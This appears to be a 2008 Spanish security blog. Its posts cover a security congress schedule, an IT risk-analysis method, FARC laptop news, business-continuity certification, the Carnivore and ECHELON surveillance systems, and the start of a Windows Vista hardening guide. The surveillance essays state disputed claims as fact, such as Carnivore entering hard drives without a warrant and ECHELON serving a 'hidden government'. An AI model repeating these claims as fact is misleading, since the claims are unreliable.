lunes, 3 de noviembre de 2008

PARTICIPACIÓN EN EL CONGRESO DE SEGURIDAD INFORMÁTICA

Ciclo de Conferencias del Congreso de Seguridad en Cómputo 2008
Programa Viernes 26
Descargar
Subir

09:00 - 09:30
Propuesta de método para la gestión de métricas de seguridad de la información Abstract

Centro de Estudios Superiores Navales, SEMAR

Jorge Flores Daza
Jorge Salinas Álvarez
Francisco Salmerón Domínguez
Mario G. López Ávila

09:30 - 10:00
Protección a redes Wireless por perturbación Abstract

Centro de Estudios Superiores Navales, SEMAR

Carlos Ernesto García Rosas
Francisco Eduardo Díaz Silva
Daniel Omar Rodríguez Vargas
Edgar Roberto Castellanos García

http://congreso.seguridad.unam.mx/info/programa2008.dsc

lunes, 29 de septiembre de 2008

ANALISIS DE RIESGOS

Titulo:
ANÁLISIS DE RIESGO PRÁCTICO EN TECNOLOGÍAS DE INFORMACIÓN.

Resumen:
El concepto de riesgo está presente en la totalidad de las actividades que realiza el ser humano, por lo que antes de implementar cualquier mecanismo de seguridad (software, hardware, política, etc.) en las Tecnologías de la Información, es necesario conocer la prioridad de aplicación y que tipi de medida puedo aplicar. El análisis de riesgos es el primer paso de la seguridad informática.

Un riesgo es un evento, el cual es incierto y tiene un impacto negativo. Análisis de riesgo es el proceso cuantitativo o cualitativo que permite evaluar los riesgos. Las metodologías de análisis de riesgos existentes describen sus etapas en forma teórica, se presentan pocos ejemplos o es necesario una herramienta para realizarlo, cuyo costo normalmente es elevado. Por lo anterior es necesario establecer una metodología cualitativa práctica para realizar un análisis de riesgos a la áreas de TI, estableciendo el cómo puede ejecutarse el análisis.

Esta descripción practica de un análisis de riesgos cuenta con una base teórica, tomando como base tres metodologías reconocidas, la publicada por el NIST en su docuemento SP 800-30, la metodología FRAAP (Facilitated Risk Analysis and Assessment Process) y MAGERIT de España.

Las etapas de esta metodología y una breve descripción de cada una, se describe a continuación:
1. Declaración del alcance.
En esta primera fase se define el motivo para la realización del análisis, la definición del o los procesos a evaluar.

2. Establecimiento del Equipo.
Definir el personal necesario que participara en el análisis.

3. Entrevistas.
Fase que permite conocer el proceso desde el punto de vista de los dueños y usuarios de la información. Las herramientas pueden ser desde una lluvia de ideas hasta cuestionarios.

4. Identificación de procesos.
Como actividades principales se encuentran la elaboración del árbol de procesos a través de un Modelo Visual, para definir dependencias entre procesos y activos.

5. Identificación de activos.
Derivado del proceso a evaluar se determinan los activos principales.

6. Valoración de procesos y activos (impacto).
El modelo visual determina que proceso, subproceso o activos son determinantes para la ejecución continua del proceso.

7. Identificación amenazas.
8. De acuerdo a cada organización, lugar geográfico y listas previamente elaboradas se deben definir las amenazas que pueden afectar nuestros activos.

9. Priorizar amenazas.
La frecuencia de algunas amenazas están establecidas a través de una formula sencilla en algunas tablas.

10. Determinar riesgo.
La relación entre amenaza-frecuencia- activo-impacto, es la condición principal a tomar en cuenta para determinar el riesgo.

11. Priorización de riesgos.
Las tablas de resultados nos permiten determinar cuales son nuestras prioridades.

12. Determinación de controles.
Existen controles determinados por estándares y metodologías una lista común puede ser de ayuda. El informe final debe determinar el control que se va a aplicar al activo de un proceso por un riesgo determinado.

viernes, 16 de mayo de 2008

Bogotá no manipuló la laptop de FARC: Interpol

Bogotá no manipuló la laptop de FARC: Interpol

Viernes 16 de Mayo de 2008

La Interpol afirmó ayer que las computadoras examinadas por sus expertos pertenecían a las Fuerzas Armadas Revolucionarias de Colombia (FARC) y que no encontró evidencia de que el gobierno de ese país manipulara, modificara, borrara o agregara información a esos equipos. El presidente venezolano Hugo Chávez calificó como una "ridiculez" y un "show de payasos" el informe que entregó Interpol sobre las computadoras confiscadas por Colombia a las FARC, y anunció que someterá a revisión la presencia de Venezuela en esa organización policial internacional.

Ronald Noble, director de Interpol, dijo durante una conferencia de prensa que "estamos completamente seguros de que las evidencias, las computadoras vinieron de un campamento terrorista de las FARC... El señor Reyes está ahora muerto, pero eran definitivamente sus computadoras, sus discos". Las computadoras eran de Raúl Reyes, uno de los siete jefes de las FARC, quien murió en el bombardeo del 1 de marzo al campamento guerrillero en territorio ecuatoriano, cercano a la frontera con Colombia. "No hubo interferencia o alteración de cualquier dato, contenido en los archivos, por parte de cualquier autoridad colombiana tras el decomiso del 1 de marzo", afirmó Noble. Agregó que el informe de la policía internacional es público, pero la decisión de divulgar todos los documentos de los computadores de Reyes es de Bogotá.

El presidente colombiano Álvaro Uribe, al ser consultado en Lima sobre si divulgaría toda la información, se limitó a decir que: "yo creo que lo que se ha dicho es suficiente sobre el tema".

Nicaragua no extraditará a Lucía

El gobierno de Daniel Ortega rechazó ayer la petición de Ecuador para extraditar a Lucía Morett, luego de que se supo la víspera que se abrió en Quito un proceso contra la mexicana, aclaró una fuente oficial.

Morett, junto con otras dos colombianas que sobrevivieron a una incursión militar de Colombia contra un campamento de las FARC en territorio ecuatoriano, el 1 de marzo, se encuentran asiladas en Nicaragua.

La ministra nicaragüense de Gobernación, Ana Isabel Morales, dijo a la estatal Radio Nicaragua que las colombianas Doris Torres Bohórquez y Martha Pérez Gutiérrez, así como Morett, no pueden ser extraditas a Ecuador "bajo ninguna circunstancia", por su condición de asilo.

"El asilo es una figura del derecho humanitario que contempla la protección a las personas que lo solicitan, precisamente cuando son perseguidas políticas", añadió la funcionaria.

El fiscal general de Ecuador, Washington Pesántez, dijo el miércoles que pesa sobre ellas cargos por amenazas a la seguridad del Estado y vínculos con la guerrilla.

Mucha información

Los discos de los computadores registrados por Interpol contienen vasta información --610 gigabytes de datos incluyendo 7,989 direcciones de correo electrónico, 10,537 archivos de video y sonido, 22,481 páginas de internet, 37,872 documentos escritos y 210,888 imágenes.

Sólo 983 de los archivos estaban codificados. Los tres computadores portátiles fueron hallados en maletines metálicos y fueron comprados en Florida, dijo un funcionario colombiano. Indicó que la mayoría de los archivos parece que le llegaban codificados a Raúl Reyes y su asistente Eliana se los abría.

Business Continuity Certification in Higher Education (TRADUCCION)

Introducción.


¿Cómo su institución haría frente a la destrucción completa de uno de sus edificios principales en el campus y a la pérdida de muchos empleados importantes de la universidad? El día de hoy muchas universidades pueden no ser capaces, de contestar a esta pregunta hoy porque no se han comprometido en la realización del trabajo necesario para la elaboración de planes en caso que se de una situación tan trágica. Aquellas instituciones que pueden contestar esta pregunta, es porque tienen desarrollados sus planes de continuidad del negocio. Esto significa que se han propuesto que cada campus, escuela, universidad o departamento entienda y se prepare para el papel que desempeñará para mantener la institución funcionando, durante e inmediatamente después de una crisis y viable a largo plazo.

Las instituciones que dedican tiempo y recursos al planeamiento de la continuidad del negocio, saben de la importancia de estos planes para proteger la seguridad de sus estudiantes, las facultades y del personal. Reconocen la importancia de la planeación de continuidad del negocio, y tienen individuos con los conocimientos y entrenamiento en caso de un desastre. Se han dado cuenta que la continuidad del negocio debe ser un factor para el establecimiento de políticas, guías prácticas y procedimientos rutinarios, y que todo el personal en la institución debe saber qué a hacer cuando un desastre ocurra.

La planeación de la continuidad del negocio puede ser un concepto difícil de entender. En las organizaciones no siempre es claro, de quien la responsabilidad de este proceso, así como de quién necesita estar implicado en el planeo. Un estudio reciente de ECAR acerca de la planeación de la continuidad del negocio en organización educativa (Yanosky, 2007) ilustra la variedad de directivos de una organización de este tipo que tienen la responsabilidad de la planeación (véase figura 1).



Figura 1. Directivos responsables en la Institución de la continuidad de negocio.


Los informes de la función de continuidad del negocio dependen de cómo está estructurada cada organización. Encontrar el lugar idóneo para la unidad para la continuidad del negocio es un esfuerzo verdadero, el factor de éxito más importante, es que los programas de continuidad del negocio tengan el apoyo de los ejecutivos de alto nivel, así como personal dedicado y debidamente informado para conducir el esfuerzo.

Un importante elemento al que hace frente una organización de educación, así como organizaciones e instituciones de todas las clases, es acerca de cómo los individuos obtendrán el conocimiento sobre la continuidad del negocio para apoyar un programa de esta índole. La certificación de la continuidad del negocio es el principal medio para alcanzar este fin. A través de las investigaciones del Instituto de Recuperación de Desastres (DRI), de los artículos, presentaciones y entrevistas con los profesionales de la continuidad del negocio, esta investigación discute las ventajas, beneficios y costos de la certificación de la continuidad del negocio. También discute las 10 mejores prácticas que son críticas al proceso de la certificación.

Elementos esenciales para la Certificación de la Continuidad del Negocio.

Las definiciones y las distinciones entre la continuidad del negocio y la recuperación del desastre son a veces difíciles de describir. Según el Glosario del Diario de Continuidad del Negocio y Recuperación de Desastres, la continuidad del negocio es: “la capacidad de una organización de proporcionar servicio y soporte a sus clientes y de mantener su viabilidad antes, durante, y después de un acontecimiento de continuidad del negocio”. Un Plan de Continuidad del Negocio (BCP) es “el proceso de desarrollar y de documentar los procedimientos que permiten a una organización responder a un acontecimiento que se presenta por un período de tiempo inaceptable y permite realizar sus funciones críticas después de una interrupción.”

La recuperación de desastres es definida como “la capacidad de una organización de responder a un desastre o una interrupción en sus servicios mediante la implementación de un Plan de Recuperación de Desastres (DRP) para estabilizar y para restaurar las funciones críticas de la organización.” Un plan de Recuperación de Desastres (DRP) es “el documento gerencial aprobado que define los recursos, acciones, tareas y datos requeridos manejar el esfuerzo de la recuperación de la tecnología. Refiere generalmente al esfuerzo de la recuperación de la tecnología. Éste es un componente del Programa de Administración de Continuidad del Negocio.”

En la conferencia de Continuidad del Negocio de EDUCAUSE en agosto de 2006, Ron Yanosky becario de ECAR definio continuidad del negocio como “la capacidad de la institución para mantener o de restaurar su organización y servicios académicos, cuando alguna circunstancia interrumpe las operaciones normales.” La recuperación de desastres se definió como: “las actividades que restauran la institución a una condición aceptable después de sufrir un desastre” – la cual incluye actividades tales como evaluación del riesgo y del impacto, priorización de procesos del negocio y de restauración de operaciones a un nivel “normal”, después de un acontecimiento. En esta definición, la recuperación de desastres se considera como parte de la Continuidad del Negocio (Yanosky, 2006).

El propósito de este documento es centrarse en la planeación de la continuidad del negocio según lo definido por el Consejo de Recuperación de Desastres (Disaster Recovery Journal Advisory) y el DRI como un proceso general para desarrollar y documentar los procedimientos preparatorios en en caso de que se presente una interrupción.


Organismos de Certificación.

En términos generales, la certificación es la evaluación independiente del conocimiento y de las habilidades que la organización o personal que certifica, ha determinado importante para la forma en que se realiza una actividad (Green, 2003). DRI es la más reconocida organización en los Estados Unidos que certifican específicamente a los profesionales de continuidad del negocio.

Existen varias organizaciones fuera de los Estados Unidos que proporcionan certificaciones similares. En el Reino Unido, el Instituto de Continuidad del Negocio (Business Continuity Institute, BCI), en Canadá es el Consorcio Internacional de Certificación de Resilicencia de Negocios (Business Resilience Certification Consortium International, BRCCI). Este documento se basa en certificaciones de DRI internacional.

DRI internacional fue fundado en 1988, con el nombre de Instituto de Recuperación de Desastres, su propósito era desarrollar una base del conocimiento en la planeación de contingencias y la gestión de riesgos. A la fecha DRI proporciona los programas educativos y de certificación para personal involucrado en la práctica de la gestión y planeación de Continuidad del Negocio. Más de 3,500 individuos se encuentran certificados por la DRI.

DRI integra varios criterios para evaluar el nivel mínimo aceptable del conocimiento y experiencia para obtener la certificación.

Roles y prácticas del personal certificado.

DRI publicó en septiembre de 1993, el "Common Body of Knowledge". Desarrollado por expertos reconocidos en la educación y planeación de la continuidad del negocio, el documento proporciona una estándar de la experiencia requerida por los profesionales en el campo. Los 10 temas cubren los siguientes asuntos (DRI, 1997a):

1. Inicio y administración del proyecto. El papel de los profesionales de la continuidad del negocio en esta etapa es conducir a los patrocinadores de proyecto para definir objetivos, políticas y factores críticos del éxito; coordinar y administrar el proyecto de Continuidad del Negocio; supervisar el proceso de Continuidad del Negocio a través de una metodología de control y administración del cambio; defender el proceso ante la gerencia y el personal; desarrollar el plan y presupuesto del proyecto; definir y recomendar a la estructura y administración e implementar el proceso de planeación de Continuidad del Negocio.
2. Evaluación y control del riesgo. El rol en esta actividad, es identificar los riesgos potenciales en la organización; entender cómo reducir y atenuar estos riesgos; identificar si se requiere experiencia externa; identificar el grado de exposición de la organización; identificar las alternativas para la mitigación y/o reducción del riesgo; conforme a la gerencia determinar los niveles aceptables de riesgo y documentar y presentar los resultados.
3. Análisis de impacto en el negocio: Su papel en esta parte es identificar a expertos con amplios conocimientos de las funciones de las diversas áreas; identificar funciones, instalaciones, personal y tecnología de la organización; identificar y definir los criterios de criticidad y obtener la aprobación de la gerencia para los criterios definidos.
4. Desarrollar las Estrategias de Continuidad del Negocio. El rol del profesional es analizar las alternativas disponibles, sus ventajas, desventajas y costos; identificar las estrategias viables de la recuperación para cada área funcional del negocio; consolidar las estrategias; desarrollar las estrategias de la unidad de negocio y obtener el compromiso de la gerencia para las estrategias desarrolladas.
5. Respuesta y operación de emergencias. Identificar los tipos potenciales de respuesta a emergencias; verificar la existencia y ubicación de los procedimientos para respuesta a emergencias, recomendar el desarrollo de tales procedimientos donde no existan; integrar los procedimientos de Continuidad del Negocio y Recuperación de Desastres mediante la respuesta a emergencias y procedimientos escalonados; identificar los controles y ordenes necesarias para el manejo de una emergencia; recomendar el desarrollo de los procedimientos de control para definir roles, autoridades y procesos de comunicación para el manejo de emergencias y asegurar que los procedimientos de respuesta a emergencias cumplan los requisitos de las autoridades públicas.
6. Desarrollar e implementar los Planes de Continuidad del Negocio. Identificar: la metodología del planeación, organización, dirección de esfuerzos y necesidades del personal; controlar el proceso del planeación y producir, implementar, probar y mantener el plan.
7. Programas y entrenamiento de concientización. El papel del profesional es establecer objetivos y componentes del programa de concientización y capacitación; identificar los requisitos de capacitación para las áreas funcionales; desarrollar la metodología del concientización y capacitación; adquirir y desarrollar herramientas para capacitación y concientización e identificar las oportunidades de capacitación y concientización externas o alternativas.
8. Mantener y aplicar los planes de continuidad del negocio. Planear, coordinar y facilitar las prácticas de los planes; evaluar y documentar los resultados de los ejercicios; actualizar el plan; reportar los resultados y evaluaciones a la gerencia; coordinar el plan de mantenimiento y asistir en el establecimiento de un programa de auditoría del plan de continuidad del negocio.
9. Comunicaciones en la crisis. Establecer programas para comunicaciones proactivas en las crisis; establecer la coordinación de la comunicación de la crisis con las agencias externas; establecer la coordinación necesaria de la comunicación de la crisis con los grupos relevantes; y establecer y probar lo medios de comunicación entre la institución y sus unidades de negocio.
10. Coordinación con agencias externas. Identificar y establecer los procedimientos de enlace para el manejo de emergencias; coordinar la administración de emergencias con las agencias externas; y mantener actualizado su conocimiento sobre leyes y regulaciones referentes a la administración de emergencias

FUENTE:
Business Continuity Certification in Higher Education
EDUCAUSE Center for Applied Research
Research Bulletin, Volume 2007, Issue 11, May 22, 2007
Ed Gregory, DePaul University y Cheryl Hover, DePaul University
www.educause.edu/ecar/

domingo, 6 de abril de 2008

¿QUÉ ES CARNIVORE?

CARNIVORE

Es el nombre de un software usado por el FBI que tiene un fin, pero no un funcionamiento, muy similar a ECHELON.

Este software se instala en los proveedores de acceso a Internet y, tras una petición proveniente de una instancia judicial, rastrea todo lo que un usuario hace durante su conexión a Internet. En teoría tiene capacidad para discernir comunicaciones legales de ilegales.

El cómo realiza este análisis, y cuál es su infraestructura y alcance real, es algo que permanece secreto, pero teniendo la misma procedencia que ECHELON (los EE.UU.) y perteneciendo a una agencia estatal (FBI), al igual que ECHELON (NSA), no sería descabellado el pensar que ambas agencias intercambien, o compartan, toda o parte de la información obtenida.
Su existencia se conoció en el año 2000, por una disputa legal con un ISP que se negaba a instalarlo, y desencadenó las protestas de grupos de libertades civiles de todo el mundo. Se hizo tan popular que hubo quien realizó obras de arte basadas en Carnivore, rebautizado después por el FBI como DCS-1000.

El FBI ha afirmado constantemente que su sistema filtra el tráfico de los datos y conserva solamente los paquetes que la corte ha autorizado a los investigadores. Sin embargo, el FBI ha mantenido el sistema completamente en secreto y no fue hasta el 11 de Julio del 2000 que se descubriese su existencia y la corporación EPIC hizo un seguimiento de los documentos del FBI relacionados con el sistema, al amparo del Acta de Libertad de la Información (FOIA).

EPIC exigió al FBI a que hiciera de público conocimiento todos los expedientes referentes a Carnivore, incluyendo su código de fuente, detalles técnicos y análisis que apuntaban a implicancias potenciales en contra de la privacía.

Después de varias gestiones en la corte y de dos órdenes judiciales, EPIC obtuvo un número de documentos en el 24 de Mayo del 2002. "Estos documentos confirman lo que hemos creído muchos de nosotros por dos años: el sistema Carnivore es una poderosa pero a la vez torpe herramienta que pone en peligro la privacía de inocentes ciudadanos americanos" manifestó David Sobel, asesor principal de EPIC. "ahora sabemos que su imprecisión, también puede poner en riesgo importantes investigaciones, incluyendo aquellas relacionadas con el terrorismo.

Cuando recién se hizo público, nosotros sugerimos que el uso del Carnivore debería ser suspendido hasta que las interrogantes que rodeaban su misterio, finalmente pudiesen ser resueltas. Nuestras demandas legales demuestran que hay mucho sobre el software Carnivore que todavía no sabemos."

La controvertida herramienta creada por el FBI para vigilar las comunicaciones por correo electrónico, Carnivore, es mucho más poderoso de lo que la institución había admitido hasta ahora. En un informe del Centro de Información para la Privacidad Electrónica, los expertos del FBI reconocen que si capacidad para vigilar las actividades de los internautas en la Red es ilimitada.

El FBI asegura que utiliza este programa limitadamente, y sólo siguiendo las órdenes de los tribunales, cuando realiza investigaciones criminales. Esta agencia policial mantiene que "Carnivore" autoelimina la información que no le interesa y no husmea en los ordenadores de todos los internautas sino sólo en los de aquellos que son sospechosos de violar la ley.
Sin embargo, los críticos de este sistema de vigilancia advierten que su poder es ilimitado. "Carnivore" tiene la capacidad de filtrar en busca de determinadas palabras clave millones de mensajes de correo electrónico que viajan por la Red y sin saber que son vigilados.

El programa tiene unas claves, que el FBI mantiene en secreto, que permiten descubrir la información que la agencia policial busca. Estas claves pueden ser palabras, nombres de políticos, de ciudades, y terminología que levante sospechas entre los investigadores del FBI. Cuando uno de estos mensajes es localizado, el programa se introduce en el disco duro del internauta "capturado" y archiva toda su información confidencial, a la espera de que los investigadores determinen si ha cometido algún delito. Incluso antes de un juez les de permiso para hacerlo.

Carnivore era la tercera generación de los sistemas de espionaje de redes del FBI. El primero fue Etherpeek, actualmente un programa comercial. El segundo, Omnivore, usado entre 1997 y 1999 y sustituido por DragonWare y constaba de tres partes: Carnivore, que capturaba la información; Packeteer, que convertía los paquetes interceptados en textos coherentes, y Coolminer, que los analizaba.

El sistema Carnivore provocó muchas controversias por sus fallos, como espiar a la persona equivocada, y porque se usó sin permiso judicial, según los grupos de libertades civiles. La ley USA Patriot acabó con la discusión, al decretar que el FBI podía monitorizar redes sin orden de un juez ni sospechas fundadas, mientras sólo captase la información del tráfico y no su contenido.

A partir de entonces, se habló menos de Carnivore. Por una parte, los ISP monitorizaban sus redes y mandaban los datos al Gobierno. Y por otra parte, floreció el mercado de sistemas comerciales más evolucionados, que sustituyeron a Carnivore.

Un ejemplo de estos programas es el Analizador Semántico de Tráfico de la empresa Narus, supuestamente usado por la Agencia Nacional de Seguridad (NSA). Se instala en diferentes puntos de una red y puede examinar cantidades ingentes de tráfico en tiempo real, identificando los paquetes interesantes, procedentes de correos, mensajería instantánea, vídeos o telefonía IP, aunque viajen a más de 10 Gbps.
El FBI ha decido dar sepultura a "Carnivore", su controvertido programa informático creado para rastrear los correos electrónicos de internautas sospechosos en busca de palabras comprometedoras. Según detalla The Register, la agencia prefiere utilizar software comercial para rastrear el tráfico en la Red.

The Register alude a dos documentos remitidos al Congreso estadounidense –uno correspondiente a 2002 y otro a 2003, ambos en PDF– por el Centro de Información sobre la Intimidad Electrónica en el que se detalla que el FBI no lo utilizó ni en 2002 ni en 2003. Ni a él ni a su otra versión, el "DCS-1000". En su lugar, el departamento recurrió a programas comerciales de rastreo en las trece investigaciones que llevó a cabo durante ese periodo.

Que un ordenador localice palabras en un documento es un juego de niños; pero que entienda el significado de una frase en un correo electrónico o una conversación telefónica es un reto. El Ministerio de Defensa español, junto con Italia y Francia, trabaja en ello desde el proyecto Infraestructura de Inteligencia Semántica Operacional (OSEMINTI), que acaba de ponerse en marcha.

El proyecto OSEMINTI debe lograr, según fuentes del Ministerio, que "los servicios de Inteligencia, por medio de ordenadores, puedan identificar frases con significados concretos en cintas de grabación o en texto escrito y, a su vez, que dichos ordenadores aprendan, con el conocimiento que van generando en su interacción con las personas".

Francia lidera el proyecto, que durará dos años. España contribuye con 1.856.000 euros, el 30% del presupuesto. Según el Ministerio, "el campo natural de OSEMINTI es la inteligencia militar", aunque también otros "ámbitos de defensa y seguridad, tanto civil como militar".
Por su capacidad de entender el significado de un texto interceptado, OSEMINTI es un paso más en la evolución de los sistemas de espionaje telemático, cuyo representante más popular en el campo civil fue Carnivore, usado durante años por el estadounidense Federal Bureau of Investigation (FBI) para monitorizar comunicaciones a través de Internet.

El Ministerio de Defensa no afirma ni desmiente que esté trabajando en un Carnivore europeo: "Será el usuario quien determine el posible uso de la tecnología una vez que se obtengan resultados desarrollados y maduros". En realidad, OSEMINTI no es un Carnivore, sino un paso más.

El problema no es recopilar la información, ni técnica ni legalmente: los operadores europeos tienen la obligación de guardar los datos de tráfico de Internet y telefonía hasta dos años, así como de obedecer las órdenes judiciales de interceptación del contenido de llamadas o comunicación por Internet.

El problema es procesar esta cantidad cada vez más diversa e ingente de datos, procedentes de múltiples fuentes, sobre todo cuando no son datos de tráfico, fácilmente procesables, sino contenidos que deben ser leídos y entendidos. Una tarea que, explica Defensa, "ahora mismo realizan personas, que son las que tienen el conocimiento para identificar frases con un significado concreto".

Para que OSEMINTI asuma la tarea, primero hay que transformar la información interceptada, mediante herramientas de conversión rápida, a un espacio semántico que entiendan las máquinas y demostrar que, explica el Ministerio, "mediante el uso de un lenguaje común entre los datos, información, algoritmos y personas, se mejora la interoperabilidad de diferentes fuentes de información o sistemas de sensores clásicos".

Esto permitirá "diseñar y desplegar sistemas inteligentes, que tengan conocimiento y capacidad de aprender, para la gestión de situaciones complejas en tiempos adecuados".

Lo que llevará al objetivo final: "Sistemas que se transforman debido a la integración de conocimiento procedente de la misión y las personas participantes". Así, el objetivo parece ser no sólo entender la información sino unificar la procedente de diversas fuentes, aunque Defensa no aclara si el proceso se hará "al vuelo", captando los datos en tiempo real, o una vez interceptados.

viernes, 4 de abril de 2008

LA RED “ECHELON”

LA RED “ECHELON”

Diseñado por la Agencia de Seguridad Nacional de Estados Unidos, ECHELON es el sistema de vigilancia más importante del mundo. Teóricamente se utiliza para escuchar los mensajes enviados por teléfono, fax o correo electrónico desde países considerados enemigos, pero en la práctica cualquiera puede ser su objetivo.

El embrión de la red de espionaje norteamericano data del inicio de la guerra fría, cuando un primer proyecto denominado “Ukusa”, se estableció entre el Reino Unido y Estados Unidos. A estos dos países se unieron Canadá, Australia y Nueva Zelanda. A partir de los años 70, las estaciones de escucha implantadas en estos países empezaron a captar las señales retransmitidas hacia la Tierra por los satélites tipo INTELSAT e Inmarsat. Y un centenar de satélites de observación “escuchan” las ondas: radio, teléfonos móviles, etc.

Los miembros de esta alianza de habla inglesa son parte de la alianza de inteligencia UKUSA, que lleva reuniendo inteligencia desde la Segunda Guerra Mundial. La existencia de ECHELON fue hecha pública en 1976 por Winslow Peck.

En realidad, el nombre "Echelon" sólo designaría a la sección del espionaje de señales (Sigint, Signals Intelligence) dedicada a interceptar las comunicaciones vía satélite. Sin embargo, la literatura actual y los documentos del Parlamento Europeo identifican la parte con el todo, y así denominan "Echelon" a toda la red de espionaje, que en realidad se llama Sistema de Espionaje de Señales de los Estados Unidos (United States Sigint Sistem; USSS). Bajo las siglas USSS se engloban la poderosa Agencia Nacional de Seguridad (NSA) norteamericana, varios departamentos de la CIA y áreas de la Armada y la Fuerza Aérea de los Estados Unidos. A la misma operativa se unen los países integrantes del acuerdo UKUSA. El Reino Unido, como contraparte de los Estados Unidos, vinculó al GCHQ (Government Communications Headquarters), su agencia Sigint, en esta red. Asimismo, las agencias de inteligencia de Canadá, Australia y Nueva Zelanda también están integradas en el mismo sistema, usan los mismos protocolos y colaboran diariamente en las actividades de interceptación, procesado y análisis de la información.

A cada estado dentro de la alianza UKUSA le es asignado una responsabilidad sobre el control de distintas áreas del planeta. La tarea principal de Canadá solía ser el control del área meridional de la antigua Unión Soviética. Durante el período de la guerra fría se puso mayor énfasis en el control de comunicaciones por satélite y radio en centro y Sudamérica, principalmente como medida para localizar tráfico de drogas y secuaces en la región. Los Estados Unidos, con su gran cadena de satélites espías y puertos de escucha controlan gran parte de Latinoamérica, Asia, Rusia asiática y el norte de China. Gran Bretaña intercepta comunicaciones en Europa, Rusia y África. Australia examina las comunicaciones de Indochina, Indonesia y el sur de China, mientras que Nueva Zelanda barre el Pacífico occidental.

En 2001, el Parlamento Europeo constató la existencia de "un sistema de interceptación mundial de las comunicaciones, resultado de una cooperación entre los Estados Unidos, el Reino Unido, Canadá, Australia y Nueva Zelanda".
Por otra parte, todas las redes de comunicación son escuchadas: de los cables submarinos (con captadores instalados por submarinistas especializados) a la red Internet (la vigilancia de la red de redes mundial es particularmente simple: la práctica totalidad de los datos transita por “nudos” situados en territorio norteamericano, incluso cuando se trata de conexiones europeas. De esta forma, cada día millones de fax, de télex, de mensajes y llamadas telefónicas del mundo entero son cribados, escogidos, seleccionados, analizados.

El sistema Echelon, fue concebido como forma de interconectar (todos los sistemas de escucha) para permitirles funcionar como componentes de un todo integrado. Las estaciones de recepción por satélite captan el conjunto de los haces de satélites INTELSAT, la más importante de las cuales esta localizada en Menwith Hill, Inglaterra, situada bajo el control directo de la NSA. Echelon está controlado por la Agencia de Seguridad Nacional (NSA). La clave de la interceptación reposa en potentes ordenadores que escrutan y analizan estas masas de mensajes y extraen los que presentan algún interés.

¿Cómo lo hace?, las estaciones de interceptación reciben los millones de mensajes destinados a las estaciones terrestres legitimas y utilizan ordenadores para descubrir los que contienen direcciones o palabras claves preprogramadas. Direcciones y palabras que los servicios de información se comunican en forma de “diccionarios” que reflejan sus preocupaciones del momento. Basta que, en el curso de un intercambio telefónico, por fax o por correo electrónico, se emitan palabras como “terrorismo”, “droga”, “guerrilla”, o nombres como “Castro”, “Gadafi”, “Sadam Hussein”, etc, para que toda la comunicación sea identificada, retenida, analizada.

Con el avance de la tecnología también se fueron implantando mejoras en el programa "Echelon", que actualmente permite a los países del tratado UKUSA operar sus bases de espionaje vía satélite prácticamente por control remoto. Es el caso, por ejemplo, de la base neozelandesa de Waihopai, como desveló el escritor Nicky Hager en su libro Secret Power, de reciente publicación en Nueva Zelanda. Así pues, sólo desde unas cuantas bases espía se puede controlar el flujo de información interceptada y clasificada por programas de Inteligencia Artificial. Actualmente, analistas y técnicos dominan desde muy pocas bases un trabajo altamente automatizado que antes tenían que desarrollar centenares de especialistas en cada puesto de interceptación. Las bases principales del sistema "Echelon" se encuentran en la sede de la Agencia Nacional de Seguridad (NSA) en Fort George Meade (Maryland, EEUU) y en la base británica de Menwith Hill (al norte del condado de Yorksire, Inglaterra).

Según declaraciones oficiales de la Sede de Comunicaciones Generales (GB) al London observer en 1992, varias organizaciones “inocentes” están en el “Libro Negro” de ECHELON. Es el caso de Amnistía Internacional, Greenpeace y Christian Aid.
ECHELON espía a grupos antiglobalización, movimientos ecologistas o sencillamente, a todos aquellos que promueven un pensamiento crítico y pueden desestabilizar el Gobierno Oculto. Incluso se utiliza a modo particular, en otro artículo publicado por el mismo periódico, un ex empleado del British Joint Intelligence Comité (BJIC), Robin Robinson, admitió que Margaret Thatcher había ordenado a título personal, que se interceptaran las comunicaciones de Lonrho la empresa propietaria del Observer, después de que éste publicara el 1989 un artículo que acusaba a su hijo Mark de haber recibido sobornos en una transacción multimillonaria de armas con Arabia Saudita. A pesar de que se enfrentaba a una acusación por traición, Robinson confesó que él había enviado mensajes interceptados de Lonrho a la oficina de la Sra. Thatcher. Ejemplos claros de que ECHELON no sólo se utiliza para espiar a los potenciales enemigos, sino también a las personas o grupos que resultan molestos a ese poder establecido.

La revista británica New Scientist de mayo del 2001 en un reportaje describe cómo la red ECHELON puede usarse para interceptar transmisiones de satélite y cables submarinos para espiar a Europa. Según el investigador y experto en espionaje Nicky Hager, existe un programa gratuito de encriptación que se puede descargar de Internet (http://www.pgpi.org) y que protege suficientemente los correos electrónicos de los ojos de ECHELON.

Puede que por todo esto, los gobiernos europeos estén preparando su propio servicio secreto: ENFOPOL. En noviembre de 1998 la revista electrónica alemana Telépolis denunció la creación de una red de espionaje a semejanza de ECHELON en Europa que parece asociarse claramente con el nacimiento de ENFOPOL y que persigue los mismos fines que el programa norteamericano. El establecimiento del servicio ENFOPOL fue ratificado por todos los países miembros de la Unión Europea en 1995, aunque ninguno de ellos lo confirme o desmienta y aunque no haya habido ningún tipo de debate público al respecto. En este sentido, el pasado 7 de mayo fue aprobada una resolución relativa a la interceptación legal de las comunicaciones por el Paramento Europeo. Esta resolución, no tiene carácter obligatorio pero todo apunta a que un grupo de países la adoptaría formando un “espacio ENFOPOL” que irá aumentando a medida que más países vayan integrándose en dicho espacio.

ENFOPOL intentará imponer sus normas a todos los operadores europeos en telefonía fija y móvil que deberán facilitar a esta policía secreta europea un acceso total a las comunicaciones de sus clientes, así como información sobre números marcados y números desde los que se llama. En el caso de Internet, los proveedores deberán facilitar “una puerta trasera”(backdoor) para que ENFOPOL pueda penetrar en sistemas privados a sus anchas. Evidentemente estos proveedores estarán obligados, además, a informar sobre los datos personales de su cliente, datos de correo electrónico y claves privadas. La información que proporcionen tampoco podrán hacerla pública así como a quién se la proporcionen. Todo ello, sin que sea imprescindible o necesaria una orden judicial.

viernes, 7 de marzo de 2008

HARDENING WINDOWS VISTA

I. INTRODUCCIÓN.
Windows Vista la última versión de Windows creada por Microsoft, esta vez se trata de una versión más segura, fiable y potente que Windows jamás había tenido antes.
La nueva versión de Windows, denominada "Windows Vista", es un sistema operativo (software) que tiene un gran potencial y está pensado para ofrecer una experiencia más segura, más fiable y de mayor potencial; los usuarios pueden utilizar los equipos con mayor eficacia y confianza, estar en contacto con los demás y además divertirse.
El nuevo sistema de Microsoft aprovechará la alta conectividad mediante ADSL y cable de los usuarios para integrar las nuevas aplicaciones Windows Live! que vivirán entre el escritorio del Win Vista y el medio online.

